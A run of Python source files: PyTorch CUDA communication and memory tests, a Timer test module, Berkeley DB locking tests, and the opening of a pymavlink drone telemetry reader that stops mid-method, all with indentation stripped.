expected_scales = [4, 2, 2, 1]
expected_growth_trackers = [1, 0, 1, 0]
expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
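# Worked through: with init_scale=4, the scaled grad 5 * 4 = 20 fits in fp16; 20000 * 4 = 80000
# overflows fp16 (max ~65504) and becomes inf, so update() halves the scale to 2; 5 * 2 = 10 fits;
# 40000 * 2 = 80000 overflows again, halving the scale to 1.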
for data, scale, growth_tracker, grad_val in zip(input_vals,
expected_scales,
expected_growth_trackers,
expected_grad_vals):
static_input.fill_(data)
g.replay()
self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
scaler.step(opt)
scaler.update()
self.assertEqual(scaler._scale, scale)
self.assertEqual(scaler._growth_tracker, growth_tracker)
def test_batch_norm_gather_stats(self):
input = torch.randn(1, 3, 3, 3, device='cuda')
mean, invstd = torch.batch_norm_gather_stats(
input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'),
running_mean=None, running_var=None, momentum=0.1, eps=1e-5, count=2
)
self.assertEqual(mean, torch.ones(3, device='cuda'))
self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
from torch.cuda import memory_allocated
device_count = torch.cuda.device_count()
current_alloc = [memory_allocated(idx) for idx in range(device_count)]
x = torch.ones(10, device="cuda:0")
self.assertTrue(memory_allocated(0) > current_alloc[0])
self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count)))
def test_matmul_memory_use(self):
def get_max_used():
torch.cuda.synchronize()
val = torch.cuda.max_memory_allocated()
torch.cuda.reset_peak_memory_stats()
return val
a = torch.rand(1, 32, 32, device="cuda")
b = torch.rand(24, 32, 1, device="cuda")
get_max_used()
torch.matmul(a, b)
matmul_mem = get_max_used()
a = a.expand(24, 32, 32)
torch.matmul(a, b)
matmul_expand_mem = get_max_used()
torch.bmm(a, b)
bmm_mem = get_max_used()
self.assertEqual(matmul_expand_mem, matmul_mem)
self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
def _test_broadcast(self, input):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
# test regular
results = comm.broadcast(input, (0, 1))
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
if input.is_cuda and input.get_device() == i: # test not copying on same device
self.assertEqual(t.data_ptr(), input.data_ptr())
# test out=
for inplace in [True, False]:
if inplace:
outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
else:
outputs = [input.cuda(0), torch.empty_like(input, device=1)]
results = comm.broadcast(input, out=outputs)
for r, o in zip(results, outputs):
self.assertIs(r, o)
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
comm.broadcast(input, (0, 1), out=outputs)
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cpu()])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to have same shape as the source .+ at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
def test_broadcast_cpu(self):
self._test_broadcast(torch.randn(5, 5))
def test_broadcast_gpu(self):
self._test_broadcast(torch.randn(5, 5).cuda())
def _test_broadcast_coalesced(self, tensors, buffer_size):
b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
for (_, bt), t in zip(b_tensors, tensors):
self.assertEqual(bt.get_device(), 1)
self.assertEqual(bt, t)
self.assertIsInstance(bt, type(t))
bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
bc_tensors_t = list(zip(*bc_tensors))
self.assertEqual(b_tensors, bc_tensors_t)
for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
self.assertEqual(bt.get_device(), bct.get_device())
self.assertIsInstance(bct, type(bt))
# check that tensors on device[0] are returned as-is
for out_tensors in (b_tensors, bc_tensors_t):
for inp_t, (out_t, _) in zip(tensors, out_tensors):
self.assertIs(inp_t, out_t)
# check that the tensors not on device[0] have different version counters
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for _, t in bc_tensors_t]
for old_version, (_, t) in zip(versions, bc_tensors_t):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
# Note: fails sometimes on the CI, passes on dual gfx906
def test_broadcast_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_empty_tensors(self):
tensors = [
torch.tensor([]).byte().cuda(),
torch.randn(5).cuda(),
torch.randn(5).double().cuda()
]
self._test_broadcast_coalesced(tensors, 256)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
x_cuda = x.cuda(0)
y_cuda = y.cuda(1)
result = comm.reduce_add((x_cuda, y_cuda))
self.assertEqual(result.get_device(), 0)
self.assertEqual(result.cpu(), x + y)
def _test_reduce_add_coalesced(self, tensors, buffer_size):
dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
for r, t in zip(r_tensors, tensors):
self.assertEqualTypeString(r, t)
self.assertEqual(r, t * 2)
rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
self.assertEqual(r_tensors, rc_tensors)
for r, rc in zip(r_tensors, rc_tensors):
self.assertEqualTypeString(rc, r)
# Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
# We can check that they have different version counters.
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for t in rc_tensors]
for old_version, t in zip(versions, rc_tensors):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
def _test_scatter(self, input, chunk_sizes=None, dim=0):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
if chunk_sizes is None:
ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
else:
ref_chunk_sizes = chunk_sizes
# test regular
result = comm.scatter(input, (0, 1), chunk_sizes, dim)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
if r.device == input.device:
self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned
# test out
out = [torch.empty_like(t) for t in result]
result = comm.scatter(input, dim=dim, out=out)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
self.assertIs(r, out[i])
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
# test error msg
if chunk_sizes is not None:
with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
comm.scatter(input, (0, 1), dim=dim, out=out)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
comm.scatter(input, (), dim=dim)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
comm.scatter(input, dim=dim, out=[])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(1, None)
comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
def test_scatter_cpu(self):
self._test_scatter(torch.randn(4, 4), dim=0)
def test_scatter_cpu_dim(self):
self._test_scatter(torch.randn(4, 4), dim=1)
def test_scatter_cpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4), dim=-2)
def test_scatter_cpu_sizes(self):
self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
def test_scatter_gpu(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
def test_scatter_gpu_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
def test_scatter_gpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
def test_scatter_gpu_sizes(self):
self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
def _test_gather(self, dim):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
x = torch.randn(2, 5, device=0)
y = torch.randn(2, 5, device=1)
expected_size = list(x.size())
expected_size[dim] += y.size(dim)
expected_size = torch.Size(expected_size)
destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
if torch.cuda.device_count() > 2:
destinations.append(torch.device('cuda:2'))
with torch.cuda.device(1):
for destination in destinations:
if destination is None:
expected_device = torch.device('cuda', torch.cuda.current_device())
else:
expected_device = destination
for use_out in [True, False]:
if use_out:
out = torch.empty(expected_size, device=expected_device)
result = comm.gather((x, y), dim, out=out)
self.assertIs(out, result)
else:
result = comm.gather((x, y), dim, destination=destination)
self.assertEqual(result.device, expected_device)
self.assertEqual(result.size(), expected_size)
index = [slice(None, None), slice(None, None)]
index[dim] = slice(0, x.size(dim))
self.assertEqual(result[tuple(index)], x)
index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
self.assertEqual(result[tuple(index)], y)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
comm.gather(())
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
comm.gather((x.cpu(), y))
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
comm.gather((x, y.unsqueeze(0)))
with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
if dim in [0, -2]:
comm.gather((x, y[:, 1:]), dim=dim)
elif dim in [1, -1]:
comm.gather((x, y[1:, :]), dim=dim)
def test_gather(self):
self._test_gather(0)
def test_gather_dim(self):
self._test_gather(1)
def test_gather_neg_dim(self):
self._test_gather(-1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_format_scatter_gather(self):
nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
for result in results:
self.assertFalse(result.is_contiguous())
self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
gathered = torch.cuda.comm.gather(results)
self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
def test_matmul_device_mismatch(self):
cpu = torch.rand((10, 10))
cuda = cpu.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cpu @ cuda
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cuda @ cpu
for s, m1, m2 in product((cpu, cuda), repeat=3):
if s.device == m1.device == m2.device:
torch.addmm(s, m1, m2)
else:
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
torch.addmm(s, m1, m2)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_scatter_namedtuple(self):
# tests ability to scatter namedtuples and retrieve a list where each
# element is of the expected namedtuple type.
fields = ("a", "b")
TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_0(a, b)
target_gpus = [torch.device(i) for i in range(num_gpus)]
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_1(a, b)
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_gather_namedtuple(self):
# tests ability to gather a list of namedtuples and return a namedtuple where each
# element is of the expected tensor type.
fields = ['a', 'b']
TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_0(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_0(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_1(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_1(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
if __name__ == '__main__':
run_tests()
|
test_Timer.py
|
#!/usr/bin/env python
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import next
from builtins import *
from builtins import object
from j5basic import Timer
from j5test import Utils
import threading
import time
class TimerDriver(object):
def __init__(self, expecteddiff=1, expectarg=False):
self.lasttime = None
self.expecteddiff = expecteddiff
self.expectarg = expectarg
self.ticks = 0
self.errors = []
def timefunc(self, testarg=None):
tm = time.time()
self.ticks += 1
assert not self.expectarg or testarg is not None
if self.lasttime is not None:
actual_diff = tm - self.lasttime
if abs(actual_diff - self.expecteddiff) > (float(self.expecteddiff) / 10):
self.errors.append("timefunc started at %r was %r later than last time %r" % (tm, actual_diff, self.lasttime))
print(self.errors[-1])
self.lasttime = tm
def sleepfunc(self, testarg=None):
"""takes an iterable and sleeps for item seconds for each item"""
next_sleep = next(testarg)
tm = time.time()
self.lasttime = tm
self.ticks += 1
print(tm, next_sleep, self.ticks)
if next_sleep:
time.sleep(next_sleep)
class TestTimer(object):
def sleep(self, seconds):
"""An overridable method to call time.sleep"""
time.sleep(seconds)
def finish_wait(self, thread, error_list, expected_sleep=0):
"""Waits for the thread to finish, checks for any errors in the given list. expected_sleep says how long we should have to wait for this..."""
thread.join()
assert not error_list
@Utils.if_long_test_run()
def test_onesec(self):
"""Test the one second resolution"""
tm = TimerDriver()
timer = Timer.Timer(tm.timefunc)
thread = threading.Thread(target=timer.start)
thread.start()
self.sleep(3)
timer.stop = True
assert tm.lasttime is not None
assert 2 <= tm.ticks <= 3
self.finish_wait(thread, tm.errors)
@Utils.if_long_test_run()
def test_twosec(self):
"""Test a non one second resolution"""
tm = TimerDriver(2)
timer = Timer.Timer(tm.timefunc, resolution=2)
thread = threading.Thread(target=timer.start)
thread.start()
self.sleep(5)
timer.stop = True
assert tm.lasttime is not None
assert 2 <= tm.ticks <= 3
self.finish_wait(thread, tm.errors)
@Utils.if_long_test_run()
def test_args(self):
"""Test passing args"""
tm = TimerDriver(expectarg=True)
timer = Timer.Timer(tm.timefunc, args=(True,))
thread = threading.Thread(target=timer.start)
thread.start()
self.sleep(3)
timer.stop = True
assert tm.lasttime is not None
self.finish_wait(thread, tm.errors)
@Utils.if_long_test_run()
def test_missed(self):
"""Test missing time events by sleeping in the target function"""
tm = TimerDriver(1)
timer = Timer.Timer(tm.sleepfunc, args=(iter([0,2,3,0,6]),))
thread = threading.Thread(target=timer.start)
thread.start()
start_time = time.time()
# make sure our sleep happens within the last 6-second pause
self.sleep(12)
print(time.time(), tm.lasttime)
timer.stop = True
assert tm.lasttime is not None
assert 4 <= tm.ticks <= 5
self.finish_wait(thread, tm.errors, 6)
@Utils.if_long_test_run()
def test_kwargs(self):
"""Test passing kwargs"""
tm = TimerDriver(expectarg=True)
timer = Timer.Timer(tm.timefunc, kwargs={"testarg":True})
thread = threading.Thread(target=timer.start)
thread.start()
self.sleep(3)
timer.stop = True
assert tm.lasttime is not None
self.finish_wait(thread, tm.errors)
def test_short_run(self):
"""Test stopping immediately"""
tm = TimerDriver(expectarg=True)
timer = Timer.Timer(tm.timefunc, kwargs={"testarg":True}, resolution=10)
thread = threading.Thread(target=timer.start)
thread.start()
timer.stop = True
assert tm.lasttime is None
self.finish_wait(thread, tm.errors)
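# A minimal usage sketch (not part of the original tests), assuming the Timer API behaves
# exactly as exercised above: a blocking start() driven from a worker thread and a `stop`
# flag polled once per resolution tick.
if __name__ == "__main__":
def _tick():
print("tick at", time.time())
demo_timer = Timer.Timer(_tick)
demo_thread = threading.Thread(target=demo_timer.start)
demo_thread.start()
time.sleep(3)
demo_timer.stop = True
demo_thread.join()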
|
test_lock.py
|
"""
TestCases for testing the locking sub-system.
"""
import time
import unittest
from test_all import db, test_support, verbose, have_threads, \
get_new_environment_path, get_new_database_path
if have_threads :
from threading import Thread
import sys
if sys.version_info[0] < 3 :
from threading import currentThread
else :
from threading import current_thread as currentThread
#----------------------------------------------------------------------
class LockingTestCase(unittest.TestCase):
import sys
if sys.version_info[:3] < (2, 4, 0):
def assertTrue(self, expr, msg=None):
self.failUnless(expr,msg=msg)
def setUp(self):
self.homeDir = get_new_environment_path()
self.env = db.DBEnv()
self.env.open(self.homeDir, db.DB_THREAD | db.DB_INIT_MPOOL |
db.DB_INIT_LOCK | db.DB_CREATE)
def tearDown(self):
self.env.close()
test_support.rmtree(self.homeDir)
def test01_simple(self):
if verbose:
print('\n' + '-=' * 30)
print("Running %s.test01_simple..." % self.__class__.__name__)
anID = self.env.lock_id()
if verbose:
print("locker ID: %s" % anID)
lock = self.env.lock_get(anID, "some locked thing", db.DB_LOCK_WRITE)
if verbose:
print("Acquired lock: %s" % lock)
self.env.lock_put(lock)
if verbose:
print("Released lock: %s" % lock)
self.env.lock_id_free(anID)
def test02_threaded(self):
if verbose:
print('\n' + '-=' * 30)
print("Running %s.test02_threaded..." % self.__class__.__name__)
threads = []
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
for t in threads:
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
for t in threads:
t.join()
def test03_lock_timeout(self):
self.env.set_timeout(0, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(0, db.DB_SET_TXN_TIMEOUT)
self.env.set_timeout(123456, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(7890123, db.DB_SET_TXN_TIMEOUT)
def deadlock_detection() :
while not deadlock_detection.end :
deadlock_detection.count = \
self.env.lock_detect(db.DB_LOCK_EXPIRE)
if deadlock_detection.count :
while not deadlock_detection.end :
pass
break
time.sleep(0.01)
deadlock_detection.end=False
deadlock_detection.count=0
t=Thread(target=deadlock_detection)
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
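# Berkeley DB lock timeouts are given in microseconds, so the 100000 below is 0.1 s;
# the blocked lock_get should therefore take at least 0.1 s before raising
# DBLockNotGrantedError, which the elapsed-time assertion checks.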
self.env.set_timeout(100000, db.DB_SET_LOCK_TIMEOUT)
anID = self.env.lock_id()
anID2 = self.env.lock_id()
self.assertNotEqual(anID, anID2)
lock = self.env.lock_get(anID, "shared lock", db.DB_LOCK_WRITE)
start_time=time.time()
self.assertRaises(db.DBLockNotGrantedError,
self.env.lock_get,anID2, "shared lock", db.DB_LOCK_READ)
end_time=time.time()
deadlock_detection.end=True
self.assertTrue((end_time-start_time) >= 0.1)
self.env.lock_put(lock)
t.join()
self.env.lock_id_free(anID)
self.env.lock_id_free(anID2)
if db.version() >= (4,6):
self.assertTrue(deadlock_detection.count>0)
def theThread(self, lockType):
import sys
if sys.version_info[0] < 3 :
name = currentThread().getName()
else :
name = currentThread().name
if lockType == db.DB_LOCK_WRITE:
lt = "write"
else:
lt = "read"
anID = self.env.lock_id()
if verbose:
print("%s: locker ID: %s" % (name, anID))
for i in range(1000):
lock = self.env.lock_get(anID, "some locked thing", lockType)
if verbose:
print("%s: Acquired %s lock: %s" % (name, lt, lock))
self.env.lock_put(lock)
if verbose:
print("%s: Released %s lock: %s" % (name, lt, lock))
self.env.lock_id_free(anID)
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
if have_threads:
suite.addTest(unittest.makeSuite(LockingTestCase))
else:
suite.addTest(unittest.makeSuite(LockingTestCase, 'test01'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
drone.py
|
"""
drone.py
====================================
The core module of my drone mav project
"""
# Import mavutil
from pymavlink import mavutil
from pymavlink import mavwp
from pymavlink.dialects.v10 import ardupilotmega
import time
#Import threading for reading mavlink messages
import threading
class MavlinkMessage:
"""Generate mavlink messages."""
def __init__(self,master):
"""Initialize
Args:
            master (object): an already-opened mavutil MAVLink connection
"""
#master connection
self.master = master
## The data coming from mavlink (not all the data are present)
#'GLOBAL_POSITION_INT'
self._lat = None
self._lon = None
self._alt = None
self._relative_alt = None
self._vx = None
self._vy = None
self._vz = None
self._heading = None
#'SYS_STATUS'
self._voltage = None
self._current = None
self._level = None
#'VFR_HUD'
self._airspeed = None
self._groundspeed = None
self._throttle = None
self._alt = None
self._climb = None
#'SERVO_OUTPUT_RAW'
self._servo1_raw = None
self._servo2_raw = None
self._servo3_raw = None
self._servo4_raw = None
self._servo5_raw = None
self._servo6_raw = None
self._servo7_raw = None
self._servo8_raw = None
        #'GPS_RAW_INT'
self._eph = None
self._epv = None
self._satellites_visible = None
self._fix_type = None
#'EKF_STATUS_REPORT'
self._ekf_poshorizabs = False
self._ekf_constposmode = False
self._ekf_predposhorizabs = False
self._ekf_flag = None
#'LOCAL_POSITION_NED'
self._north = None
self._east = None
self._down = None
#'HEARTBEAT'
self._flightmode = None
self._armed = False
self._system_status = None
self._autopilot_type = None # PX4, ArduPilot, etc.
self._vehicle_type = None # quadcopter, plane, etc.
#'ATTITUDE'
self._roll = None
self._pitch = None
self._yaw = None
self._rollspeed = None
self._pitchspeed = None
self._yawspeed = None
#'MISSION_COUNT'
self._msg_mission_count = None
#'MISSION_ITEM'
self._msg_mission_item = None
#'COMMAND_ACK'
self._msg_command_ack = None
#'MISSION_REQUEST'
self._wp = mavwp.MAVWPLoader()
self._wp_uploaded = None
self._msg_mission_request = None
self.messages = {
'GLOBAL_POSITION_INT' :self.__read_global_pos_int,
'SYS_STATUS' :self.__read_system_status,
'VFR_HUD' :self.__read_vfr_hud,
'SERVO_OUTPUT_RAW' :self.__read_servo_output_raw,
'GPS_RAW_INT' :self.__read_gps_raw_int,
'EKF_STATUS_REPORT' :self.__read_ekf_status_report,
'LOCAL_POSITION_NED' :self.__read_local_position_ned,
'HEARTBEAT' :self.__read_heartbeat,
'ATTITUDE' :self.__read_attitude,
#The variables for mavlink message listed below should be cleared once it is read.
'MISSION_COUNT' :self.__read_mission_count,
'MISSION_ITEM' :self.__read_mission_item,
'MISSION_REQUEST' :self.__read_mission_request,
'COMMAND_ACK' :self.__read_command_ack
}
#start new thread for getting data whenever object is called
self.data_read = threading.Thread(target = self.__update)
self.data_read.daemon = True # In daemon mode so that ctrl + c will close the program
self.data_read.start()
def __update(self):
while True:
#print("Here")
msg = self.master.recv_match()
if not msg:
continue
function = self.messages.get(msg.get_type(),lambda x:"Invalid")
function(msg)
def __read_global_pos_int(self,msg):
self._lat = msg.lat * 1e-7
self._lon = msg.lon * 1e-7
self._alt = msg.alt * 1e-3
self._relative_alt = msg.relative_alt * 1e-3
self._vx = msg.vx
self._vy = msg.vy
self._vz = msg.vz
self._heading = int(msg.hdg * 1e-2)
def __read_system_status(self,msg):
self._voltage = msg.voltage_battery
self._current = msg.current_battery
self._level = msg.battery_remaining
def __read_vfr_hud(self,msg):
self._airspeed = msg.airspeed
self._groundspeed = msg.groundspeed
self._throttle = msg.throttle
self._alt = msg.alt
self._climb = msg.climb
def __read_servo_output_raw(self,msg):
self._servo1_raw = msg.servo1_raw
self._servo2_raw = msg.servo2_raw
